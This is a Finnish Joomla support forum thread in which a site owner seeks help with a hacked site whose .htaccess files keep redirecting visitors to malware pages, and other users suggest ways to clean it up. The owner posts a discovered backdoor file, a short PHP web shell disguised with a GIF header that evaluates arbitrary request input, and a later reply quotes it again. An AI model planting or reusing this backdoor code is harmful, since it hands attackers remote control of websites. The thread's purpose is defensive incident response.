.htaccess uudelleenohjaukset pöpösivuille
- mirkoe
- Poissa
- Ylläpitäjä
- Kahvilla pärjää aina!
Eräällä asiakkaallani oli aivan sama tilanne, kun ei ollut päivittänyt sivujaan. Ongelma korjaantui Joomlan päivityksen jälkeen.
Jos se on Joomlalla, teemme sen - www.clicker.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- NonCoder
- Aiheen kirjoittaja
- Poissa
- Tulokas
- Viestejä: 15
- Vastaanotettu kiitos 0
Lisäosat päivitetty uusimpaan.
Kirjoitusoikeudet yms tarkistettu.
Kaikki salasanat vaihdettu.
Joku reikä tuolla on vielä oltava?
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- mirkoe
- Poissa
- Ylläpitäjä
- Kahvilla pärjää aina!
Kannattaa ehkä ladata palvelimen tiedostot omalle koneelle, deletoida palvelimelta kaikki, puhdistaa tiedot omalla koneella ja ladata takaisin!
Jos se on Joomlalla, teemme sen - www.clicker.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- Kelpieracer
- Vieras
Toveri pystyi sitten ajamaan tuota PHP-tiedostoa, ilmeisesti jollain automatiikalla
GET:mydomain.com/STORY.PHP?param=...
Tätä kautta pääsivät sitten vaihtelemaan noita -htaccess -tiedostoja, lähinnä samalla palvelimella olevalta PHPBB-foorumilta.
Etsi sivustolta viimeisten muutaman päivän aikana muutetut PHP-tiedostot. Se virus on jokin tai jotkin niistä.
Itse poistin vaan nuo ylimääräiset PHP-tiedostot ja kun Joomla-sivusto on lukossa, ei .htaccessit enää muutu.
En tosin vielä tiedä, mitä reikää käyttäen tuon PHP-tiedoston ujuttaminen sivustolle on ollut mahdollista, mutta kun foorumi on lukossa, eivät ole uutta PHP-tiedosta ujuttaneet vielä.
e: sun pitää käsin poistaa nuo PHP-tiedostot. Joomlan päivittäminen uuteen versioon ei auta, jos toveri on jo tuon PHP-tiedoston sun palvelimelle ujuttanut. Toki uusi versio on hyvästä ennaltaehkäisyksi. Olisi kiva tietää, onko joku löytänyt tuon reiän, mitä käyttäen toveri tuon PHP-tiedostonsa saa meidän palvelimille ujutettua.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- quietFinn
- Poissa
- Valvoja
NonCoder kirjoitti: Joomla päivitetty viimeisimpään 1.5.26 versioon.
Lisäosat päivitetty uusimpaan.
Kirjoitusoikeudet yms tarkistettu.
Kaikki salasanat vaihdettu.
Joku reikä tuolla on vielä oltava?
Kehottaisin ottamaan yhteyttä palveluntarjoajaan.
Koska siellä on tuollaista aktiviteettiä ollut ihan viime aikoina niin ei ole kovinkaan vaikeaa palvelimen lokeista löytää mitä takaporttia on käytetty.
Ja jos on kyseessä cPanel palvelin niin voi itsekin tutkia kävijälokeja:
cPanel-> Tilastot ja lokitiedostot-> Viimeisimmät kävijät
ja
cPanel-> Tilastot ja lokitiedostot-> Kävijälokit
netFinn - Taatusti Joomla!-yhteensopiva webhosting: www.netfinn.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jkwebdesign
- Poissa
- Valvoja
Eli tuo tartunta voi olla oikeastaan missä tahansa php tiedostossa. Pahimmalla kerralla taisi olla koodinpätkää useassa kymmenessä filussa, joista suurin osa sivupohjissa.
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- quuki
- Vieras
Minulla oli kanssa vähän samaa ongelmaa omilla sivuilla, toki php tiedostojen kanssa. Sucurilla oli joku scripti (world pressille tarkoitettu mutta kävi myös joomlaan) jonka ajamalla sai puhdistettua joko kotisivuhakemiston php tiedostot kerralla. Kyse oli jostain Eval base64_decode jutusta. antoi uudelleenohjaus pyyntöjä jatkuvasti haittasivuille. Sucurin scriptin ajoin ja sitten ostin tuon OSE securitysuiten ja tietty kaikki muut asiat laitoin kuntoon, ja kunnossa olen pitänyt. Ei ongelmaa...
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- NonCoder
- Aiheen kirjoittaja
- Poissa
- Tulokas
- Viestejä: 15
- Vastaanotettu kiitos 0
Sivut oli taas siivottu, mutta 30-40min myöhemmin tilanne palautui samaksi.
Latasin äsken varmuuskopion omalle koneelle ja löysin stories kansiosta story.php:n mitä ei ainakaan uudessa Joomla asennuspaketissa ole?
GIF89a1
<?php
if (isset($_REQUEST['p1'])) {
eval(stripslashes($_REQUEST['p1']));
} else {
echo "djeu84m";
}
?>
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jkwebdesign
- Poissa
- Valvoja
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- Kelpieracer
- Vieras
Just sama versio tästä bakteerista kuin mulla. Äkkiä pois.NonCoder kirjoitti: Kokeilin taas kaikkea mahdollista ja tutkin kaikki hakemistot.
Sivut oli taas siivottu, mutta 30-40min myöhemmin tilanne palautui samaksi.
Latasin äsken varmuuskopion omalle koneelle ja löysin stories kansiosta story.php:n mitä ei ainakaan uudessa Joomla asennuspaketissa ole?
GIF89a1 <?php if (isset($_REQUEST['p1'])) { eval(stripslashes($_REQUEST['p1'])); } else { echo "djeu84m"; } ?>
Muuten: Se ohje, että ihan ekaksi päivittää uuden version Joomlasta saattaa haitata tämän .htaccess-pöpön etsintää? Kun sitten ei niin helposti löydäkään viime päivinä muuttuneita .PHP -tiedostoja.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.